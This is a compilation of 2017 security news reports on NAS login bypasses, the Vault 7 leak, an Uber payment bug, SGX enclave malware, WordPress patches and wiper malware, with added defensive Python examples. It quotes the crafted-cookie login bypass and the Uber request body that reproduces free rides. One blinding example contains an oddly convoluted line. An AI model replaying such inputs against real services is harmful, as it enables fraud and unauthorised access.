“The above code contains a function called “login_check”, this function is used by all of the backend PHP scripts and is used to verify pre-authenticated users. The above code has two paths, one which involves checking the session values for “username” and “isAdmin” and another (if the prior fails) attempts to complete the same process but with cookies.” explained Zenofex.

“Because cookies are supplied by the user, the requirements that the scripts are looking for can be met by the attacker. The above process for sessions and cookies is summed up as follows.

“username” variable is set and is not empty – User is logged in as a normal privileged user.
“isAdmin” variable is set to 1 – User is logged in as an administrator.
This means that any time there is a login check within the PHP scripts, an attacker is able to bypass the check by supplying 2 specially crafted cookie values.”
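The defect Zenofex describes is an authentication check that falls back to values supplied by the client. Below is an added illustration written for this page, not the device's PHP code: a Python model of the two-path logic beside a hardened version that only honours cookies carrying a server-side HMAC, with `SERVER_SECRET` and the user names as constructed values.

```python
"""Client-trusted cookie fallback versus an HMAC-authenticated cookie (added example)."""
import base64
import binascii
import hashlib
import hmac
import json
from typing import Optional

# Constructed secret for the example; a real deployment loads it from protected storage.
SERVER_SECRET = b"constructed-secret-change-me"


def login_check_vulnerable(session: dict, cookies: dict) -> str:
    """Model of the flawed two-path check: the session is consulted first and, if that
    fails, the *unauthenticated* cookies are trusted for the same "username"/"isAdmin"
    values, so any client can set those two cookies itself."""
    for source in (session, cookies):
        if source.get("username"):
            return "admin" if str(source.get("isAdmin")) == "1" else "user"
    return "anonymous"


def sign_cookie(username: str, is_admin: bool, secret: bytes = SERVER_SECRET) -> str:
    """Issue a remember-me token: base64(JSON claims) '.' HMAC-SHA256(secret, claims)."""
    payload = json.dumps({"username": username, "isAdmin": int(is_admin)},
                         sort_keys=True).encode()
    tag = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + "." + tag


def verify_cookie(token: str, secret: bytes = SERVER_SECRET) -> Optional[dict]:
    """Return the claims only if the tag matches; malformed or tampered tokens yield None."""
    try:
        b64, tag = token.split(".", 1)
        payload = base64.urlsafe_b64decode(b64.encode())
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(payload)


def login_check_hardened(session: dict, cookies: dict) -> str:
    """Same two paths, but the cookie path carries privilege only when it is signed.
    The server-side session (populated by a real login) is still trusted directly."""
    if session.get("username"):
        return "admin" if str(session.get("isAdmin")) == "1" else "user"
    token = cookies.get("auth")
    claims = verify_cookie(token) if token else None
    if claims and claims.get("username"):
        return "admin" if claims.get("isAdmin") == 1 else "user"
    return "anonymous"


if __name__ == "__main__":
    crafted = {"username": "admin", "isAdmin": "1"}      # what an attacker can send
    print("vulnerable:", login_check_vulnerable({}, crafted))   # admin
    print("hardened:  ", login_check_hardened({}, crafted))     # anonymous
    print("signed:    ", login_check_hardened({}, {"auth": sign_cookie("alice", False)}))
```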

The experts at Exploitee.rs have found 85 security issues tied to Western Digital My Cloud NAS devices.

My Cloud users can contact the Customer Service for any question and to receive support. It is important that My Cloud NAS devices are configured to enable automatic firmware updates.


WikiLeaks releases documents detailing CIA hacking tools and capabilities
8.3.2017 securityaffairs BigBrothers

WikiLeaks has obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking tools and capabilities
WikiLeaks announced on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA).

The huge trove of data, called “Vault 7,” exposed the hacking capabilities of the US Intelligence Agency and its internal infrastructure.

“The first full part of the series, “Year Zero”, comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virginia.” reads the announcement issued by WikiLeaks.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.”

According to Wikileaks, the precious archive appears to have been circulated among former US government experts and contractors in an unauthorized manner. One of them likely provided the files to WikiLeaks.

The archive includes confidential information, malicious codes, and exploits specifically designed to target popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

The hacking tools developed by the US cyber spies can target mobile devices, desktop computers, and IoT devices such as routers and smart TVs.

The arsenal used by the Central Intelligence Agency hackers was composed of hacking tools developed by the CCI’s Engineering Development Group (EDG).

The developers at EDG are tasked with developing and testing any kind of malicious code, including implants, backdoors, exploits, Trojans and viruses.

The CIA has dozens of zero-day exploits in its arsenal that can be used to target almost any platform, from Windows and Linux PCs to Android and iOS mobile devices.

“CIA malware and hacking tools are built by EDG (Engineering Development Group), a software development group within CCI (Center for Cyber Intelligence), a department belonging to the CIA’s DDI (Directorate for Digital Innovation).” continues Wikileaks.

WikiLeaks confirmed that it will not release the tools and exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons’ should be analyzed, disarmed and published.”


The leaked documents also revealed that the CIA used hacking tools developed by the British intelligence agencies (GCHQ and MI5), the NSA, the FBI and also contractors.

The documents refer to a joint CIA and MI5 development of malware, dubbed Weeping Angel, that was used to compromise Samsung Smart TVs.

“The attack against Samsung smart TVs was developed in cooperation with the United Kingdom’s MI5/BTSS. After infestation, Weeping Angel places the target TV in a ‘Fake-Off’ mode, so that the owner falsely believes the TV is off when it is on. In ‘Fake-Off’ mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.” continues Wikileaks.

The documents confirm that the CIA hackers were able to bypass the encryption implemented by most popular secure messaging apps such as Signal, WhatsApp, and Telegram.

The leaked files paint a disconcerting scenario: the CIA was in possession of tools able to hack almost any platform, from modern vehicles to air-gapped systems.


WikiLeaks Exposed CIA's Hacking Tools And Capabilities Details
7.3.2017 thehackernews BigBrothers

WikiLeaks has published a massive trove of confidential documents in what appears to be the biggest ever leak involving the US Central Intelligence Agency (CIA).
WikiLeaks announced a series, Year Zero, under which the whistleblower organization will reveal details of the CIA's global covert hacking program.
As part of Year Zero, WikiLeaks published its first archive, dubbed Vault 7, which includes a total of 8,761 documents of 513 MB (torrent | password) on Tuesday, exposing information about numerous zero-day exploits developed for iOS, Android, and Microsoft's Windows operating system.
WikiLeaks claims that these leaks came from a secure network within the CIA's Center for Cyber Intelligence headquarters at Langley, Virginia.
The authenticity of such dumps cannot be verified immediately, but since WikiLeaks has a long track record of releasing such top secret government documents, the community and governments should take it very seriously.
CIA's Zero-Day Exploits & Ability to Bypass Encrypted Apps
According to initial analysis and the press release, the leak sheds light on the CIA's entire hacking capability, including its ability to hack smartphones and popular social media messaging apps, among them WhatsApp, the world's most popular messaging app.
"These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Weibo, Confide and Cloackman by hacking the smartphones that they run on and collecting audio and message traffic before encryption is applied," WikiLeaks said.
The exploits come from a variety of sources, including partner agencies like NSA and GCHQ or private exploit traders, as well as the CIA's specialized unit in its Mobile Development Branch that develops zero-day exploits and malware for hacking smartphones, including iPhones and iPads.
"By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other weaponized malware," WikiLeaks said.
The agency can remotely activate smartphones' cameras and microphones at its will, allowing it to hack social media platforms before encryption can be applied, WikiLeaks claims in the statement on their website.
"Weeping Angel" Attack — Hacking Smart TVs to Spy On Users
Vault 7 also details a surveillance technique — codenamed Weeping Angel — used by the agency to infiltrate smart TV's, transforming them into covert microphones.
Samsung smart TVs, which previously drew criticism for their always-on voice command system, are vulnerable to Weeping Angel hacks that place the TVs into a “Fake-Off” mode.
In Fake-Off mode, the TV owner believes it is off when it is actually on, allowing the CIA to record conversations "in the room and sending them over the Internet to a covert CIA server."
HammerDrill v2.0: A Malware to Steal Data From Air Gapped PCs
The CIA's cyberweapon arsenal also includes a cross-platform malware, dubbed Hammer Drill, that targets Microsoft, Linux, Solaris, MacOS, and other platforms via viruses spreading through CDs/DVDs and USB drives, data hidden in images, and other sophisticated malware.
What is more interesting, Hammer Drill v2.0 also added an air gap jumping capability used to target computers that are isolated from the Internet or other networks and are believed to be the most secure computers on the planet.
Besides listing all hacking tools and operations, the documents also include instructions for using those hacking tools, tips on the configuration of Microsoft Visual Studio (which is classified as Secret/NOFORN), as well as testing notes for various hacking tools.
Some of the leaked documents even suggest that the CIA was even developing tools to remotely control certain vehicle software, allowing the agency to cause "accidents" which would effectively be "nearly undetectable assassinations."
For more details on the leak, you can peruse the WikiLeaks website.


WikiLeaks Releases Details on CIA Hacking Tools

7.3.2017 securityweek BigBrothers
WikiLeaks revealed on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA). The leak, dubbed “Vault 7,” apparently exposes the CIA’s vast hacking capabilities.

WikiLeaks said the files come from the CIA’s Center for Cyber Intelligence (CCI) in Langley, Virginia, and they have been circulating among former U.S. government hackers and contractors. One of these individuals provided the data to the whistleblower organization, which has called it “the largest intelligence publication in history.”

According to WikiLeaks, the files, dated between 2013 and 2016, include malware and exploits targeting the products of several major tech companies, including Apple, Google, Microsoft and Samsung. The leaked tools can allegedly be used to hack mobile devices, desktop computers, routers, smart TVs and other types of systems.


These pieces of software are said to have been developed by the CCI’s Engineering Development Group (EDG). WikiLeaks said the EDG develops, tests and provides support for backdoors, exploits, Trojans, viruses and other types of malware used by the CIA.

In addition to hacking tools developed by its own people, the agency allegedly obtained tools from British intelligence agencies (GCHQ and MI5), the NSA, the FBI and cyber arms contractors. For instance, the agency is said to have collaborated with MI5 on the development of a tool designed for spying on people through Samsung smart TVs.

The CIA allegedly has dozens of zero day exploits designed for targeting devices running Android, iOS, Windows, OS X and Linux. WikiLeaks claims some of these tools even allow the agency to bypass the encryption of secure messaging apps such as Signal, WhatsApp, and Telegram.

However, this does not necessarily mean these applications have been compromised – an attacker who has root access to a mobile device can often access messages exchanged via secure IM apps without the need to break the encryption.

WikiLeaks will not release the tools and exploits “until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should be analyzed, disarmed and published.”

The files also appear to show that the CIA has developed tools designed for targeting the control systems of modern vehicles, multi-platform malware, and threats that add themselves to CDs and DVDs in order to jump air gaps.

Following the Edward Snowden leaks, the U.S. government has promised to disclose serious vulnerabilities that represent a high risk or affect a product that is widespread in critical infrastructure. If the files obtained by WikiLeaks are genuine, the CIA breached that commitment.


Bug Allowed Free Uber Rides

7.3.2017 securityweek Vulnerebility

A bug in Uber could have been used by users to ride for free anywhere the service is available, a researcher has discovered.

Discovered by Anand Prakash from Bangalore, India, the issue could have been abused by attackers to take unlimited free rides from their Uber account. In fact, the researcher took free rides in both the United States and India to demonstrate the vulnerability, but only after the Uber team agreed to this, he says.

The issue was found to be related to the payment method that users are required to specify when creating an account on Uber.com. Such an account is required to be able to use the service, and users can either pay with cash when the ride is completed, or can have the cost automatically charged to their credit/debit card.

The researcher discovered that if an invalid payment method is specified, one could ride Uber for free. The bug, he explains, resides in a POST request to dial.uber.com. To reproduce the vulnerability, one would simply need to input an invalid value for “payment_method_id” in said request:

{"start_latitude":12.925151699999999,"start_longitude":77.6657536,"product_id":"db6779d6-d8da-479f-8ac7-8068f4dade6f","payment_method_id":"xyz"}
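The flaw above is a server-side validation failure: a payment_method_id that resolved to nothing was treated as if payment had been handled. As an added, constructed example (not Uber's code; the account ids, method ids and function names are hypothetical), the following Python shows a fail-closed check that creates a ride only when the supplied id is registered on the requesting account, using the request body quoted above as the rejected input:

```python
import json

# Constructed sample data: payment methods registered on a hypothetical account.
ACCOUNT_PAYMENT_METHODS = {
    "acct-123": {"pm-card-1": "card", "pm-cash": "cash"},
}

# The request body quoted in the article, with the invalid "xyz" method id.
SAMPLE_REQUEST = (
    '{"start_latitude":12.925151699999999,"start_longitude":77.6657536,'
    '"product_id":"db6779d6-d8da-479f-8ac7-8068f4dade6f","payment_method_id":"xyz"}'
)

# Constructed variant that references a method actually registered on the account.
VALID_REQUEST = SAMPLE_REQUEST.replace('"xyz"', '"pm-card-1"')


class RideRequestError(ValueError):
    """Raised for any request that must not result in a ride being created."""


def parse_ride_request(raw_body):
    """Parse the JSON body of a ride request and check that every required field is present."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise RideRequestError("malformed JSON") from exc
    if not isinstance(body, dict):
        raise RideRequestError("body must be a JSON object")
    required = ("start_latitude", "start_longitude", "product_id", "payment_method_id")
    missing = [key for key in required if key not in body]
    if missing:
        raise RideRequestError("missing fields: " + ", ".join(missing))
    pm = body["payment_method_id"]
    if not isinstance(pm, str) or not pm:
        raise RideRequestError("payment_method_id must be a non-empty string")
    return body


def authorize_ride(account_id, raw_body):
    """Fail closed: a ride is authorized only when payment_method_id resolves to a
    method registered on the requesting account. An id that resolves to nothing is
    rejected instead of being silently treated as 'no charge'."""
    body = parse_ride_request(raw_body)
    methods = ACCOUNT_PAYMENT_METHODS.get(account_id, {})
    pm = body["payment_method_id"]
    if pm not in methods:
        raise RideRequestError(f"unknown payment method {pm!r} for account {account_id}")
    return {
        "account": account_id,
        "payment_type": methods[pm],
        "product": body["product_id"],
    }


def ride_allowed(account_id, raw_body):
    """Boolean wrapper around authorize_ride for callers that only need a verdict."""
    try:
        authorize_ride(account_id, raw_body)
    except RideRequestError:
        return False
    return True


if __name__ == "__main__":
    print("xyz accepted? ", ride_allowed("acct-123", SAMPLE_REQUEST))   # False
    print("pm-card-1 accepted?", ride_allowed("acct-123", VALID_REQUEST))  # True
```

The point of the lookup is that the set of valid ids is owned by the server and keyed by the authenticated account, so a client cannot influence the outcome by supplying an unexpected value; anything not in that set is an error, never a free ride.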

Prakash reported the vulnerability to Uber via the company’s bug bounty program on HackerOne, which offers rewards between $100 and $10,000 for bugs in several dozen Uber properties. The issue was apparently discovered in August 2016, and Uber was able to fix it the same day the researcher disclosed it. The company awarded the researcher $5,000 for this finding.

In addition to making information about the issue public, the researcher also published a video that shows how the vulnerability can be abused.

A member of the HackerOne community since 2013, Prakash is actively hunting bugs in other services as well, including Twitter, Souq.com, Yahoo!, and Slack. The researcher is ranked 29 on HackerOne, but ranks 14 in Uber’s bug bounty program (and is placed third in Twitter’s).


Number of Darknet Sites Plunges After Freedom Hosting Hack

7.3.2017 securityweek Hacking
The number of hidden services has dropped significantly following the cyberattack on Freedom Hosting II, which had been estimated to host roughly 20 percent of the sites on the dark web.

Freedom Hosting II, which hosted nearly 11,000 websites, was brought down by Anonymous-affiliated hackers in early February. The hacktivists accused the service of hosting many child pornography sites, and leaked a large quantity of data from its systems, including over 380,000 user records.

An analysis conducted this month using OnionScan, an open source tool designed for investigating the dark web, showed that of more than 30,000 known Tor-based services, only just over 4,400 were still online.

“These 4,400 hidden services are far fewer than previous scans,” said anonymity and privacy researcher Sarah Jamie Lewis, who runs the OnionScan project. “We believe that the Freedom Hosting II takedown not only removed many thousands of active sites but also may have affected other hosting providers who were hosting some infrastructure on top of Freedom Hosting II.”

Lewis believes the drop in the number of hidden services may also be a result of the disappearance of secure email service Sigaint. The service went offline without warning a few weeks ago.

According to the latest OnionScan report, roughly 4,000 HTTP services have been detected on the dark web. The scan has also identified approximately 250 TLS services, 270 SSH services, 220 Bitcoin nodes, 100 SMTP services, and a handful of FTP and VNC services.

The scan also showed that many hidden services are still not configured properly; researchers have managed to extract almost a thousand unique IP addresses belonging to hidden services and the clearnet clients that accessed them.

Several reports have been published since April 2016, when the OnionScan tool was made available. However, Lewis said OnionScan reports will no longer be released in the near future, as the focus will shift to trying to solve the underlying problems. The tool will continue to be maintained and improved with new features.


Researchers Use Intel SGX to Conceal Malware, Extract Private Keys

7.3.2017 securityweek Virus
A group of researchers from Austria's Graz University of Technology has demonstrated that malware running on Intel SGX (Software Guard Extensions) can attack the host and can be used to extract RSA private keys.

SGX, an isolation mechanism introduced by Intel in its microprocessors to protect code and data from modification or disclosure, uses special execution environments called enclaves, which run in an encrypted memory area and thus protect an application’s secrets from attackers. According to Intel, cryptographic keys should be stored inside enclaves because they can thwart side-channel attacks.

While some argued before that the hardware-supported isolation could result in super malware inside enclaves, others refuted the fears, saying that enclaves always run with user space privileges and cannot perform any I/O operations. In a newly published paper (PDF), Graz University of Technology researchers prove that enclave malware can indeed attack its hosting system.

“We demonstrate a cache attack from within a malicious enclave that is extracting secret keys from co-located enclaves. Our proof-of-concept malware is able to recover RSA keys by monitoring cache access patterns of an RSA signature process in a semi-synchronous attack. The malware code is completely invisible to the operating system and cannot be analyzed due to the isolation provided by SGX,” the paper reads.

This attack, the report says, is the first malware running on real SGX hardware that abuses the SGX protection features to conceal itself. The researchers were able to demonstrate the attack both in a native environment and across multiple Docker containers and explain that they performed a Prime+Probe cache side-channel attack on a co-located SGX enclave running an up-to-date RSA implementation that was using a constant-time multiplication primitive.

The attack was successful despite the lack of timers, large pages, physical addresses, and shared memory in SGX enclaves. Moreover, the researchers were able to extract 96% of an RSA private key from a single trace in a semi-synchronous attack, and even managed to “extract the full RSA private key in an automated attack from 11 traces within 5 minutes.”

The paper reveals that both the target program (which uses SGX to protect an RSA signing application) and the malicious application are unprivileged and run on the same host machine. The malware keeps the attack code inside an SGX enclave to avoid detection, with the loader being used only to start the enclave. The malware can remain undetected even if state-of-the-art malware detection software is used, the researchers say.

Countermeasures to prevent such attacks are also proposed at three levels: at the source level, exponent blinding and bit slicing; at the OS level, enclave coloring, removing access to high-resolution timers, allowing the cloud provider to access and scan enclaves for malicious activity, heap randomization, and Intel CAT (Cache Allocation Technology); and at the hardware level, combining Intel CAT with SGX and using secure RAM.
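Exponent blinding, the first source-level countermeasure listed, is easy to show concretely. The following is an added Python example, not the paper's code; the toy RSA key is constructed and far too small for real use. Each signature uses a fresh exponent d' = d + r·φ(n), which produces the same result as d but has a different bit pattern, so the square-and-multiply sequence that a Prime+Probe trace observes changes on every run and bits recovered from one trace do not reveal d:

```python
import secrets

# Constructed toy RSA key (the classic textbook example; never use sizes like this).
P, Q = 61, 53
N = P * Q                 # 3233
PHI = (P - 1) * (Q - 1)   # 3120
E = 17
D = pow(E, -1, PHI)       # 2753, the private exponent


def blind_exponent(d, phi, r=None, r_bits=64):
    """Return (d', r) with d' = d + r*phi for a fresh random r.

    Because m^phi == 1 (mod n) for an RSA modulus, m^d' == m^d (mod n): the
    signature is unchanged, but the exponent bits that a cache side channel
    could observe differ on every call.  r is forced odd so that d' != d."""
    if r is None:
        r = secrets.randbits(r_bits) | 1
    return d + r * phi, r


def sign(m, d, n):
    """Plain (unblinded) RSA signature: the operation the paper's malware traced."""
    return pow(m, d, n)


def blinded_sign(m, d, phi, n):
    """RSA signature computed with a freshly blinded exponent."""
    d_blind, _ = blind_exponent(d, phi)
    return pow(m, d_blind, n)


def verify(sig, m, e, n):
    """Standard textbook verification; holds for blinded and unblinded signatures alike."""
    return pow(sig, e, n) == m


def exponent_hamming_distance(d, phi):
    """Number of bit positions in which two independently blinded exponents differ,
    i.e. how different two consecutive square-and-multiply sequences look."""
    a, _ = blind_exponent(d, phi)
    b, _ = blind_exponent(d, phi)
    return bin(a ^ b).count("1")


if __name__ == "__main__":
    msg = 65
    print("plain   :", sign(msg, D, N))
    print("blinded :", blinded_sign(msg, D, N if False else N) if False else blinded_sign(msg, D, PHI, N))
    print("verifies:", verify(blinded_sign(msg, D, PHI, N), msg, E, N))
    print("bits differing between two blinded exponents:", exponent_hamming_distance(D, PHI))
```

Blinding does not make a single exponentiation leak-free; it makes the leaked sequence useless, because an attacker who recovers 96% of d' from one trace has learned a value that is never used again. That is why the paper lists it as a source-level mitigation that a signing library can adopt without any change to SGX itself.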

“Besides not fully preventing malicious enclaves, SGX provides protection features to conceal attack code. Even the most advanced detection mechanisms using performance counters cannot detect our malware. Intel intentionally does not include SGX activity in the performance counters for security reasons. However, this unavoidably provides attackers with the ability to hide attacks as it eliminates the only known technique to detect cache side-channel attacks,” the researchers say.


WordPress 4.7.3 is out to fix 6 security issues, but CSRF flaw remains unpatched
7.3.2017 securityaffairs Vulnerebility

WordPress 4.7.3 release is out to fix six security issues, but a CSRF vulnerability discovered in July 2016 remains unpatched.
WordPress has issued a new security release, WordPress 4.7.3, that addresses six security flaws, including three cross-site scripting (XSS) vulnerabilities. The flaws were discovered by the security experts Chris Andrè Dale, Yorick Koster, Simon P. Briggs, Marc Montpas and a user who goes by the moniker “Delta.”

The XSS vulnerabilities can be exploited via media file metadata, video URLs in YouTube embeds, and taxonomy term names.


Below the list of vulnerabilities addressed by the WordPress 4.7.3 release:

Cross-site scripting (XSS) via media file metadata. Reported by Chris Andrè Dale, Yorick Koster, and Simon P. Briggs.
Control characters can trick redirect URL validation. Reported by Daniel Chatfield.
Unintended files can be deleted by administrators using the plugin deletion functionality. Reported by xuliang.
Cross-site scripting (XSS) via video URL in YouTube embeds. Reported by Marc Montpas.
Cross-site scripting (XSS) via taxonomy term names. Reported by Delta.
Cross-site request forgery (CSRF) in Press This leading to excessive use of server resources. Reported by Sipke Mellema.
It is interesting to note that both CSRF and XSS flaws were discovered in July 2016 during the Summer of Pwnage competition organized by the security firm Securify. The researchers released proof-of-concept (PoC) code to exploit both issues.

According to Koster, who spotted the vulnerabilities in the playlist functionality, the attacker needs to convince an editor or administrator into uploading an MP3 file containing specially crafted metadata. The attacker’s code will then be executed when the metadata is processed by the renderTracks() or wp_playlist_shortcode() functions.

However, one CSRF vulnerability in WordPress still has not been patched; the flaw was discovered in July 2016 and the details of its exploitation have not been disclosed.

The flaw could be exploited by an attacker to steal FTP and SSH login credentials.

The security expert Cengiz Han Sahin explained this vulnerability may have a high impact, but the probability of exploitation is low.


StoneDrill Disk Wiping Malware Found Targeting European Industries
7.3.2017 thehackernews Virus

A new disk wiping malware has been uncovered targeting a petroleum company in Europe, which is quite similar to the mysterious disk wiper malware Shamoon that wiped data from 35,000 computers at Saudi Arabia's national oil company in 2012.
Disk wiping malware has the ability to cripple any organization by permanently wiping out data from all hard drives and external storage on a targeted machine, causing great financial and reputational damage.
Security researchers from Moscow-based antivirus provider Kaspersky Lab discovered the new wiper StoneDrill while researching last November's re-emergence of Shamoon malware (Shamoon 2.0) attacks – two attacks occurred in November and one in late January.
Shamoon 2.0 is a more advanced version of the Shamoon malware; it reportedly hit 15 government agencies and organizations across the world, wipes data, and takes control of the computer’s boot record, preventing the computers from being turned back on.
Meanwhile, Kaspersky researchers found that the newly discovered StoneDrill wiper malware was built in a similar "style" to Shamoon 2.0, but did not share the exact same code base.
"The discovery of the StoneDrill wiper in Europe is a significant sign that the group is expanding its destructive attacks outside the Middle East," Kaspersky researchers say in a blog post. "The target for the attack appears to be a large corporation with a wide area of activity in the petrochemical sector, with no apparent connection or interest in Saudi Arabia."
Researchers also noticed that the samples of Shamoon 2.0 and StoneDrill were also uploaded multiple times to online multi-scanner antivirus engines from Saudi Arabia last November.
Here's How StoneDrill Malware Works:
StoneDrill has been designed to run as a service and to target all systems connected to a Windows domain within an organization. In order to spread itself, the malware relies on a list of hard-coded, previously stolen usernames and passwords belonging to administrators of the targeted domain.
Once infected, StoneDrill automatically generates a custom wiper malware module without connecting to any command-and-control server, rendering the infected machines completely inoperable.
StoneDrill wiper malware also includes the following characteristics:
New Evasion Techniques
StoneDrill features an impressive ability to evade detection and avoid sandbox execution. Unlike Shamoon, StoneDrill doesn't make use of disk drivers during installation.
Instead, StoneDrill relies on memory injection of the data wiping module into the victim's preferred browser.
StoneDrill also makes use of Visual Basic Scripts to run self-delete scripts, while Shamoon did not use any external scripts.
Backdoor Ability
Like Shamoon, StoneDrill also includes backdoor functions that are used for espionage operations, with screenshot and upload capabilities.
Kaspersky researchers identified at least four command-and-control (C&C) servers that the attackers used to spy on and steal data from an unknown number of targets.
Furthermore, StoneDrill uses command and control communications to interact with the malware instead of using a "kill time" as in the Shamoon attacks analyzed in January 2017 that do not implement any C&C communication.
Ransomware Component
Besides wiping functionality, the new malware also includes a ransomware component.
However, this feature is currently inactive; attackers could leverage this part of the platform in future attacks to hold victims hostage for financial or ideological gain.
Like Shamoon 2.0, StoneDrill was reportedly compiled in October and November 2016.
Although StoneDrill mostly targets organizations in Saudi Arabia, Kaspersky researchers discovered the malware victims in Europe as well, meaning that the attackers might be widening their campaign.
For more technical details about the StoneDrill and Shamoon 2.0 attacks, you can head on to Kaspersky's official blog.


macOS RAT Uses 0-Day for Root Access

7.3.2017 securityweek  Virus
A new remote access tool (RAT) targeting macOS, believed to be using an unpatched 0-day vulnerability to gain root access on target machines, is currently being advertised on underground markets.

Dubbed Proton, the RAT was found on a closed Russian cybercrime message board, being offered by its author “in one of the leading underground cybercrime markets,” Sixgill researchers report. The Trojan is currently offered at 2 Bitcoins (around $2,500) for single installations, but an unlimited installations option is also available, at 40 Bitcoin.

According to the author, the tool was written in native Objective C and is fully undetectable by existing anti-virus programs for macOS. Objective C, the security researchers say, offers the great advantage that the malware doesn’t require dependencies.

Advertised as “a professional FUD surveillance and control solution” and packing root-access privileges and features, the tool allows an attacker to take full control of the victim’s machine. The malware can execute any bash command under root, monitor keystrokes, upload/download files to/from the victim’s machine, grab screenshots or webcam captures, get updates, and also send notifications to the attacker.

The Trojan also enables the attacker to connect via SSH/VNC to the target machine, and can even present a custom native window requesting information such as a credit-card, driver’s license and more. Further, the tool also packs iCloud access capability, even when two-factor authentication is enabled.

The malware can deliver these features because it “is shipped with genuine Apple code-signing signatures,” Sixgill researchers explain. The author might have tricked Apple’s filtration process for third-party software developers, either by registering to Apple’s developer program under a false ID, or by leveraging stolen developer credentials, which allowed them to get the necessary certificates.

Of higher concern would be the use of a previously unpatched 0-day vulnerability to gain root access. If such a vulnerability indeed exists and Proton’s author is in its possession, others might be aware of it and even exploit it as well.

For distribution, Proton’s operators would simply need to masquerade the Trojan as a genuine application, with a custom icon and name, and then trick the victim into downloading and installing it.

The RAT is being sold through a dedicated website that also includes some promotional material related to the malware, along with a login system, the researchers say. Proton’s author advertises the tool under the premise of legitimate use, and even uploaded a short video demonstrating the installation process to YouTube.


Six Flaws Patched With Release of WordPress 4.7.3

7.3.2017 securityweek  Vulnerebility

WordPress developers announced on Monday the availability of version 4.7.3, a security release that includes patches for six vulnerabilities and 39 maintenance fixes.

WordPress 4.7.3 addresses three cross-site scripting (XSS) flaws that can be exploited via media file metadata, video URLs in YouTube embeds, and taxonomy term names. Chris Andrè Dale, Yorick Koster, Simon P. Briggs, Sucuri researcher Marc Montpas, and a user with the moniker “Delta” have been credited for finding these security holes.

The latest WordPress update also fixes a vulnerability that allows control characters to trick redirect URL validation (reported by Daniel Chatfield), and a bug that can lead to administrators deleting unintended files via the plugin deletion functionality (reported by xuliang).

Another vulnerability patched on Monday, identified by Sipke Mellema, is a cross-site request forgery (CSRF) in the “Press This” function. Exploitation of this flaw can lead to excessive use of server resources and a denial-of-service (DoS) condition.

Mellema and Koster identified the CSRF and XSS vulnerabilities in July 2016 as part of the Summer of Pwnage competition organized by Dutch security firm Securify. The details of the security holes and proof-of-concept (PoC) code have been made public on the Summer of Pwnage website.

According to Koster, he identified two XSS flaws in WordPress’ playlist functionality. An attacker needs to convince an editor or administrator into uploading an MP3 file containing specially crafted metadata. The attacker’s code will get executed when the metadata is processed by the renderTracks() or wp_playlist_shortcode() methods.

Over 100 vulnerabilities have been found in the WordPress core and plugins as part of the Summer of Pwnage project, and most of the issues have been disclosed on March 1, regardless of whether or not they have been fixed.

One WordPress core vulnerability that still has not been patched is a CSRF found by Koster in July 2016. The details of the flaw have not been disclosed, but Cengiz Han Sahin, co-founder of Securify, told SecurityWeek that the unpatched flaw could, in theory, allow an attacker to steal FTP and SSH login credentials. The expert said the vulnerability can have a high impact, but the probability of exploitation is low.

While the developers of the content management system (CMS) claim WordPress 4.7.3 patches six vulnerabilities, there could be other issues they have not disclosed in an effort to protect users. When WordPress 4.7.2 was released on January 26, it appeared to patch only three vulnerabilities, but in reality it also resolved a critical privilege escalation and content injection issue that was disclosed only one week later.

This critical flaw has been exploited in defacements carried out by script kiddies and attacks whose goal was to gain full control of a website.


Ransomware Module Found in Shamoon 2.0

7.3.2017 securityweek  Virus

The Shamoon 2.0 malware used recently in attacks aimed at the Middle East has a fully functional ransomware module that can encrypt files on the infected device, Kaspersky Lab said on Monday.

The security firm has published a report detailing Shamoon 2.0 and a new piece of malware, dubbed “StoneDrill,” that has been connected to both Shamoon and the Iran-linked threat actor Charming Kitten, aka NewsBeef and Newscaster.

One of the most interesting pieces of information shared by the company about Shamoon 2.0 is that, in addition to its well-known wiper functionality, it includes a ransomware module. The ransomware functionality is currently inactive, but experts believe it could be leveraged in future Shamoon attacks.

Once it infects a machine, Shamoon checks the system time to determine when to drop the main payload, which allows the attackers to either wipe or encrypt files and partitions.

“In the ‘encryption/ransomware’ mode, a weak pseudo-random RC4 key is generated, which is further encrypted by the RSA public key and stored directly on the hard drive (at <\Device\Harddisk0\Partition0>) starting at offset 0x201, right after the master boot record,” Kaspersky said in its report.

The ransomware module can be used to encrypt Shamoon components, files stored in Windows folders (e.g. Desktop, Downloads, Documents, Pictures), NTFS master file table (MFT) data from all drives except the system drive, files in Windows system folders, and part of the FirmwareBootDevice partition.
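The report's detail that the encrypted RC4 key is written at offset 0x201, right after the MBR, suggests a simple forensic triage check over a raw disk image. The Python below is an added example, not Kaspersky's tooling: it reads the sectors between the MBR and the first partition and reports whether anything non-zero is there and how random it looks. The sample images are constructed, and the blob only mimics the placement described, not Shamoon's real data; boot loaders such as GRUB also write to this area, so a hit is a prompt to look closer, not a verdict.

```python
import hashlib
import math

SECTOR = 512
MBR_SIGNATURE = b"\x55\xaa"
GAP_START = 0x200     # first byte after the MBR; offset 0x201 lies in this sector
GAP_SECTORS = 62      # sectors before the first partition on 63-sector-aligned layouts


def shannon_entropy(data):
    """Bits of entropy per byte; encrypted key material scores close to 8, code lower."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def inspect_mbr_gap(image, gap_sectors=GAP_SECTORS):
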